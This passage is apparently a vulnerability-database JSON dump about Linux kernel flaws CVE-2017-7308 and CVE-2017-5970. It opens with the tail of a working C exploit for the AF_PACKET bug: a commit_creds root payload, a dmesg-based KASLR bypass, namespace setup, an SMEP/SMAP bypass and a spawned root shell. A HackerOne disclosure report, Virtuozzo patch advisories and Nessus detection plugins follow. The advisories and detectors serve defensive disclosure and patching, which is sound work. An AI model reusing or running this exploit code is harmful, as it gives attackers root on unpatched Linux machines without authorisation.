Getting root * * * * * * * * * * * * * * * *\r\n\r\ntypedef unsigned long __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\r\ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\r\n\r\nvoid get_root_payload(void) {\r\n\t((_commit_creds)(KERNEL_BASE + COMMIT_CREDS))(\r\n\t\t((_prepare_kernel_cred)(KERNEL_BASE + PREPARE_KERNEL_CRED))(0)\r\n\t);\r\n}\r\n\r\n// * * * * * * * * * * * * * Simple KASLR bypass * * * * * * * * * * * * * * *\r\n\r\n#define SYSLOG_ACTION_READ_ALL 3\r\n#define SYSLOG_ACTION_SIZE_BUFFER 10\r\n\r\nunsigned long get_kernel_addr() {\r\n\tint size = klogctl(SYSLOG_ACTION_SIZE_BUFFER, 0, 0);\r\n\tif (size == -1) {\r\n\t\tperror(\"[-] klogctl(SYSLOG_ACTION_SIZE_BUFFER)\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tsize = (size / getpagesize() + 1) * getpagesize();\r\n\tchar *buffer = (char *)mmap(NULL, size, PROT_READ|PROT_WRITE,\r\n\t\tMAP_PRIVATE|MAP_ANONYMOUS, -1, 0);\r\n\r\n\tsize = klogctl(SYSLOG_ACTION_READ_ALL, &buffer[0], size);\r\n\tif (size == -1) {\r\n\t\tperror(\"[-] klogctl(SYSLOG_ACTION_READ_ALL)\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tconst char *needle1 = \"Freeing SMP\";\r\n\tchar *substr = (char *)memmem(&buffer[0], size, needle1, strlen(needle1));\r\n\tif (substr == NULL) {\r\n\t\tfprintf(stderr, \"[-] substring '%s' not found in dmesg\\n\", needle1);\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tfor (size = 0; substr[size] != '\\n'; size++);\r\n\r\n\tconst char *needle2 = \"ffff\";\r\n\tsubstr = (char *)memmem(&substr[0], size, needle2, strlen(needle2));\r\n\tif (substr == NULL) {\r\n\t\tfprintf(stderr, \"[-] substring '%s' not found in dmesg\\n\", needle2);\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tchar *endptr = &substr[16];\r\n\tunsigned long r = strtoul(&substr[0], &endptr, 16);\r\n\r\n\tr &= 0xfffffffffff00000ul;\r\n\tr -= 0x1000000ul;\r\n\r\n\treturn r;\r\n}\r\n\r\n// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * *\r\n\r\nvoid exec_shell() {\r\n\tchar *shell = \"/bin/bash\";\r\n\tchar *args[] = {shell, \"-i\", NULL};\r\n\texecve(shell, args, NULL);\r\n}\r\n\r\nvoid fork_shell() {\r\n\tpid_t rv;\r\n\r\n\trv = fork();\r\n\tif (rv == -1) {\r\n\t\tperror(\"[-] fork()\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tif (rv == 0) {\r\n\t\texec_shell();\r\n\t}\r\n}\r\n\r\nbool is_root() {\r\n\t// We can't simple check uid, since we're running inside a namespace\r\n\t// with uid set to 0. Try opening /etc/shadow instead.\r\n\tint fd = open(\"/etc/shadow\", O_RDONLY);\r\n\tif (fd == -1)\r\n\t\treturn false;\r\n\tclose(fd);\r\n\treturn true;\r\n}\r\n\r\nvoid check_root() {\r\n\tprintf(\"[.] checking if we got root\\n\");\r\n\r\n\tif (!is_root()) {\r\n\t\tprintf(\"[-] something went wrong =(\\n\");\r\n\t\treturn;\r\n\t}\r\n\r\n\tprintf(\"[+] got r00t ^_^\\n\");\r\n\r\n\t// Fork and exec instead of just doing the exec to avoid potential\r\n\t// memory corruptions when closing packet sockets.\r\n\tfork_shell();\r\n}\r\n\r\nbool write_file(const char* file, const char* what, ...) {\r\n\tchar buf[1024];\r\n\tva_list args;\r\n\tva_start(args, what);\r\n\tvsnprintf(buf, sizeof(buf), what, args);\r\n\tva_end(args);\r\n\tbuf[sizeof(buf) - 1] = 0;\r\n\tint len = strlen(buf);\r\n\r\n\tint fd = open(file, O_WRONLY | O_CLOEXEC);\r\n\tif (fd == -1)\r\n\t\treturn false;\r\n\tif (write(fd, buf, len) != len) {\r\n\t\tclose(fd);\r\n\t\treturn false;\r\n\t}\r\n\tclose(fd);\r\n\treturn true;\r\n}\r\n\r\nvoid setup_sandbox() {\r\n\tint real_uid = getuid();\r\n\tint real_gid = getgid();\r\n\r\n if (unshare(CLONE_NEWUSER) != 0) {\r\n\t\tperror(\"[-] unshare(CLONE_NEWUSER)\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n if (unshare(CLONE_NEWNET) != 0) {\r\n\t\tperror(\"[-] unshare(CLONE_NEWUSER)\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tif (!write_file(\"/proc/self/setgroups\", \"deny\")) {\r\n\t\tperror(\"[-] write_file(/proc/self/set_groups)\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\tif (!write_file(\"/proc/self/uid_map\", \"0 %d 1\\n\", real_uid)){\r\n\t\tperror(\"[-] write_file(/proc/self/uid_map)\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\tif (!write_file(\"/proc/self/gid_map\", \"0 %d 1\\n\", real_gid)) {\r\n\t\tperror(\"[-] write_file(/proc/self/gid_map)\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tcpu_set_t my_set;\r\n\tCPU_ZERO(&my_set);\r\n\tCPU_SET(0, &my_set);\r\n\tif (sched_setaffinity(0, sizeof(my_set), &my_set) != 0) {\r\n\t\tperror(\"[-] sched_setaffinity()\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tif (system(\"/sbin/ifconfig lo up\") != 0) {\r\n\t\tperror(\"[-] system(/sbin/ifconfig lo up)\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n}\r\n\r\nint main() {\r\n\tprintf(\"[.] starting\\n\");\r\n\r\n\tsetup_sandbox();\r\n\r\n\tprintf(\"[.] namespace sandbox set up\\n\");\r\n\r\n#if ENABLE_KASLR_BYPASS\r\n\tprintf(\"[.] KASLR bypass enabled, getting kernel addr\\n\");\r\n\tKERNEL_BASE = get_kernel_addr();\r\n\tprintf(\"[.] done, kernel text: %lx\\n\", KERNEL_BASE);\r\n#endif\r\n\r\n\tprintf(\"[.] commit_creds: %lx\\n\", KERNEL_BASE + COMMIT_CREDS);\r\n\tprintf(\"[.] prepare_kernel_cred: %lx\\n\", KERNEL_BASE + PREPARE_KERNEL_CRED);\r\n\r\n#if ENABLE_SMEP_SMAP_BYPASS\r\n\tprintf(\"[.] native_write_cr4: %lx\\n\", KERNEL_BASE + NATIVE_WRITE_CR4);\r\n#endif\r\n\r\n\tprintf(\"[.] padding heap\\n\");\r\n\tkmalloc_pad(KMALLOC_PAD);\r\n\tpagealloc_pad(PAGEALLOC_PAD);\r\n\tprintf(\"[.] done, heap is padded\\n\");\r\n\r\n#if ENABLE_SMEP_SMAP_BYPASS\r\n\tprintf(\"[.] SMEP & SMAP bypass enabled, turning them off\\n\");\r\n\toob_timer_execute((void *)(KERNEL_BASE + NATIVE_WRITE_CR4), CR4_DESIRED_VALUE);\r\n\tprintf(\"[.] done, SMEP & SMAP should be off now\\n\");\r\n#endif\r\n\r\n\tprintf(\"[.] executing get root payload %p\\n\", &get_root_payload);\r\n\toob_id_match_execute((void *)&get_root_payload);\r\n\tprintf(\"[.] done, should be root now\\n\");\r\n\r\n\tcheck_root();\r\n\r\n\twhile (1) sleep(1000);\r\n\r\n\treturn 0;\r\n}\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-93094", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "hackerone": [{"lastseen": "2019-09-11T00:32:11", "bulletinFamily": "bugbounty", "bounty": 0.0, "cvelist": ["CVE-2017-7308"], "description": "Hi!\n\n[CVE-2017-7308](https://nvd.nist.gov/vuln/detail/CVE-2017-7308) is a vulnerability I found in the Linux kernel caused by a signedness issue in AF_PACKET sockets. It can be exploited to gain kernel code execution from an unprivileged process. The kernel has to be built with CONFIG_PACKET for the vulnerability to be present. A lot of modern distributions enable this option by default.\n\nI initially reported this vulnerability to security@kernel.org following the coordinated disclosure process. As advised by them I've developed a fix for this vulnerability and sent it upstream. The fix was [committed](https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=2b6867c2ce76c596676bec7d2d525af525fdc6e2) on Mar 30, 2017.\n\nI wrote a proof-of-concept exploit for the 4.8.0-41-generic Ubuntu kernel which gains root from an unprivileged user, which can be found [here](https://github.com/xairy/kernel-exploits/tree/master/CVE-2017-7308). More details about the vulnerability and exploitation can be found [here](https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html).\n\nThe reason I'm reporting this now is that a [similar bug](https://hackerone.com/reports/347282) that I've reported a while ago has recently been triaged and addressed, so it seems that LPE Linux kernel bugs are within the scope of this IBB program.\n\nThanks!\n\n## Impact\n\nThis vulnerability allows a local attacker to elevate privileges to root on a machine with vulnerable Linux kernel version.", "modified": "2019-09-11T00:19:43", "published": "2019-08-29T13:48:44", "id": "H1:684567", "href": "https://hackerone.com/reports/684567", "type": "hackerone", "title": "The Internet: Linux kernel: CVE-2017-7308: a signedness issue in AF_PACKET sockets", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "virtuozzo": [{"lastseen": "2019-11-05T11:27:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-5970"], "description": "The cumulative Virtuozzo ReadyKernel patch updated with security fixes. The patch applies to Virtuozzo kernels 3.10.0-327.18.2.vz7.15.2 (Virtuozzo 7.0.0), 3.10.0-327.36.1.vz7.18.7 (Virtuozzo 7.0.1), and 3.10.0-327.36.1.vz7.20.18 (Virtuozzo 7.0.3).\n**Vulnerability id:** CVE-2017-5970\nA vulnerability was found in the Linux kernel where having malicious IP options present would cause the ipv4_pktinfo_prepare() function to drop/free the dst. This could result in a system crash or possible privilege escalation.\n\n**Vulnerability id:** PSBM-64734\nA vulnerability was found in the implementation of SCTP protocol in the Linux kernel. If the sctp module was loaded on the host, a privileged user inside a container could cause a kernel crash by triggering use-after-free in the __sctp_connect() function with a specially crafted sequence of system calls.\n\n", "edition": 1, "modified": "2017-04-28T00:00:00", "published": "2017-04-28T00:00:00", "id": "VZA-2017-032", "href": "https://help.virtuozzo.com/customer/portal/articles/2796925", "title": "Kernel security update: CVE-2017-5970 and other; Virtuozzo ReadyKernel patch 20.0 for Virtuozzo 7.0.x", "type": "virtuozzo", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-11-05T11:27:42", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7308"], "description": "The cumulative Virtuozzo ReadyKernel patch updated with a security fix. The patch applies to Virtuozzo versions 7.0.0, 7.0.1, and 7.0.3.\n**Vulnerability id:** CVE-2017-7308\nThe packet_set_ring function in net/packet/af_packet.c in the Linux kernel through 4.10.6 does not properly validate certain block-size data, which allows local users to cause a denial of service (overflow) or possibly have unspecified other impact via crafted system calls.\n\n", "edition": 1, "modified": "2017-04-04T00:00:00", "published": "2017-04-04T00:00:00", "id": "VZA-2017-027", "href": "https://help.virtuozzo.com/customer/portal/articles/2781369", "title": "Kernel security update: Virtuozzo ReadyKernel patch 17.0 for kernels 3.10.0-327.18.2.vz7.15.2 (Virtuozzo 7.0.0), 3.10.0-327.36.1.vz7.18.7 (Virtuozzo 7.0.1), and 3.10.0-327.36.1.vz7.20.18 (Virtuozzo 7.0.3)", "type": "virtuozzo", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-07T14:25:46", "description": "This update the for Linux Kernel 3.12.61-52.69 fixes one issue. The\nfollowing security bug was fixed :\n\n - CVE-2017-5970: The ipv4_pktinfo_prepare function in\n net/ipv4/ip_sockglue.c in the Linux kernel allowed\n attackers to cause a denial of service (system crash)\n via (1) an application that made crafted system calls or\n possibly (2) IPv4 traffic with invalid IP options\n (bsc#1025013).\n\n - CVE-2017-7308: The packet_set_ring function in\n net/packet/af_packet.c in the Linux kernel did not\n properly validate certain block-size data, which allowed\n local users to cause a denial of service (overflow) or\n possibly have unspecified other impact via crafted\n system calls (bsc#1030575, bsc#1031660).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 32, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-16T00:00:00", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2017:1281-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-5970", "CVE-2017-7308"], "modified": "2017-05-16T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_69-xen", "cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_69-default"], "id": "SUSE_SU-2017-1281-1.NASL", "href": "https://www.tenable.com/plugins/nessus/100207", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:1281-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100207);\n script_version(\"3.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-5970\", \"CVE-2017-7308\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2017:1281-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update the for Linux Kernel 3.12.61-52.69 fixes one issue. The\nfollowing security bug was fixed :\n\n - CVE-2017-5970: The ipv4_pktinfo_prepare function in\n net/ipv4/ip_sockglue.c in the Linux kernel allowed\n attackers to cause a denial of service (system crash)\n via (1) an application that made crafted system calls or\n possibly (2) IPv4 traffic with invalid IP options\n (bsc#1025013).\n\n - CVE-2017-7308: The packet_set_ring function in\n net/packet/af_packet.c in the Linux kernel did not\n properly validate certain block-size data, which allowed\n local users to cause a denial of service (overflow) or\n possibly have unspecified other impact via crafted\n system calls (bsc#1030575, bsc#1031660).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1025013\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1030575\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1031660\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-5970/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-7308/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20171281-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?fcd7778e\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 12:zypper in -t patch\nSUSE-SLE-SAP-12-2017-763=1\n\nSUSE Linux Enterprise Server 12-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-2017-763=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'AF_PACKET packet_set_ring Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_69-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_69-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/02/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/16\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_61-52_69-default-2-4.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_61-52_69-xen-2-4.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T02:05:28", "description": "The ipv4_pktinfo_prepare function in net/ipv4/ip_sockglue.c in the\nLinux kernel through 4.9.9 allows attackers to cause a denial of\nservice (system crash) via (1) an application that makes crafted\nsystem calls or possibly (2) IPv4 traffic with invalid IP options.\n(CVE-2017-5970)\n\nImpact\n\nThis vulnerability may allow a remote user to cause a denial of\nservice (DoS) for the BIG-IP control plane.\n\nNote : Only the BIG-IP control plane is vulnerable; the data plane is\nnot affected by this vulnerability.", "edition": 29, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2017-04-19T00:00:00", "title": "F5 Networks BIG-IP : Linux kernel vulnerability (K60104355)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-5970"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/a:f5:big-ip_link_controller", "cpe:/a:f5:big-ip_advanced_firewall_manager", "cpe:/a:f5:big-ip_policy_enforcement_manager", "cpe:/a:f5:big-ip_application_security_manager", "cpe:/a:f5:big-ip_application_acceleration_manager", "cpe:/a:f5:big-ip_local_traffic_manager", "cpe:/h:f5:big-ip", "cpe:/a:f5:big-ip_application_visibility_and_reporting", "cpe:/a:f5:big-ip_access_policy_manager"], "id": "F5_BIGIP_SOL60104355.NASL", "href": "https://www.tenable.com/plugins/nessus/99444", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution K60104355.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99444);\n script_version(\"3.7\");\n script_cvs_date(\"Date: 2019/01/04 10:03:41\");\n\n script_cve_id(\"CVE-2017-5970\");\n\n script_name(english:\"F5 Networks BIG-IP : Linux kernel vulnerability (K60104355)\");\n script_summary(english:\"Checks the BIG-IP version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote device is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The ipv4_pktinfo_prepare function in net/ipv4/ip_sockglue.c in the\nLinux kernel through 4.9.9 allows attackers to cause a denial of\nservice (system crash) via (1) an application that makes crafted\nsystem calls or possibly (2) IPv4 traffic with invalid IP options.\n(CVE-2017-5970)\n\nImpact\n\nThis vulnerability may allow a remote user to cause a denial of\nservice (DoS) for the BIG-IP control plane.\n\nNote : Only the BIG-IP control plane is vulnerable; the data plane is\nnot affected by this vulnerability.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.f5.com/csp/article/K60104355\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution K60104355.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_acceleration_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_visibility_and_reporting\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/04/18\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/04/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( ! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"K60104355\";\nvmatrix = make_array();\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# AFM\nvmatrix[\"AFM\"] = make_array();\nvmatrix[\"AFM\"][\"affected\" ] = make_list(\"14.0.0\",\"13.0.0-13.1.0\");\nvmatrix[\"AFM\"][\"unaffected\"] = make_list(\"14.1.0\",\"14.0.0.3\",\"13.1.1\",\"13.1.0.8\",\"12.0.0-12.1.2\",\"11.4.0-11.6.1\");\n\n# AM\nvmatrix[\"AM\"] = make_array();\nvmatrix[\"AM\"][\"affected\" ] = make_list(\"14.0.0\",\"13.0.0-13.1.0\");\nvmatrix[\"AM\"][\"unaffected\"] = make_list(\"14.1.0\",\"14.0.0.3\",\"13.1.1\",\"13.1.0.8\",\"12.0.0-12.1.2\",\"11.4.0-11.6.1\");\n\n# APM\nvmatrix[\"APM\"] = make_array();\nvmatrix[\"APM\"][\"affected\" ] = make_list(\"14.0.0\",\"13.0.0-13.1.0\");\nvmatrix[\"APM\"][\"unaffected\"] = make_list(\"14.1.0\",\"14.0.0.3\",\"13.1.1\",\"13.1.0.8\",\"12.0.0-12.1.2\",\"11.4.0-11.6.1\",\"11.2.1\");\n\n# ASM\nvmatrix[\"ASM\"] = make_array();\nvmatrix[\"ASM\"][\"affected\" ] = make_list(\"14.0.0\",\"13.0.0-13.1.0\");\nvmatrix[\"ASM\"][\"unaffected\"] = make_list(\"14.1.0\",\"14.0.0.3\",\"13.1.1\",\"13.1.0.8\",\"12.0.0-12.1.2\",\"11.4.0-11.6.1\",\"11.2.1\");\n\n# AVR\nvmatrix[\"AVR\"] = make_array();\nvmatrix[\"AVR\"][\"affected\" ] = make_list(\"14.0.0\",\"13.0.0-13.1.0\");\nvmatrix[\"AVR\"][\"unaffected\"] = make_list(\"14.1.0\",\"14.0.0.3\",\"13.1.1\",\"13.1.0.8\",\"12.0.0-12.1.2\",\"11.4.0-11.6.1\",\"11.2.1\");\n\n# LC\nvmatrix[\"LC\"] = make_array();\nvmatrix[\"LC\"][\"affected\" ] = make_list(\"14.0.0\",\"13.0.0-13.1.0\");\nvmatrix[\"LC\"][\"unaffected\"] = make_list(\"14.1.0\",\"14.0.0.3\",\"13.1.1\",\"13.1.0.8\",\"12.0.0-12.1.2\",\"11.4.0-11.6.1\",\"11.2.1\");\n\n# LTM\nvmatrix[\"LTM\"] = make_array();\nvmatrix[\"LTM\"][\"affected\" ] = make_list(\"14.0.0\",\"13.0.0-13.1.0\");\nvmatrix[\"LTM\"][\"unaffected\"] = make_list(\"14.1.0\",\"14.0.0.3\",\"13.1.1\",\"13.1.0.8\",\"12.0.0-12.1.2\",\"11.4.0-11.6.1\",\"11.2.1\");\n\n# PEM\nvmatrix[\"PEM\"] = make_array();\nvmatrix[\"PEM\"][\"affected\" ] = make_list(\"14.0.0\",\"13.0.0-13.1.0\");\nvmatrix[\"PEM\"][\"unaffected\"] = make_list(\"14.1.0\",\"14.0.0.3\",\"13.1.1\",\"13.1.0.8\",\"12.0.0-12.1.2\",\"11.4.0-11.6.1\");\n\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n if (report_verbosity > 0) security_warning(port:0, extra:bigip_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running any of the affected modules\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-07T14:25:35", "description": "This update for the Linux Kernel 3.12.60-52_60 fixes one issue. The\nfollowing security bug was fixed :\n\n - CVE-2017-5970: The 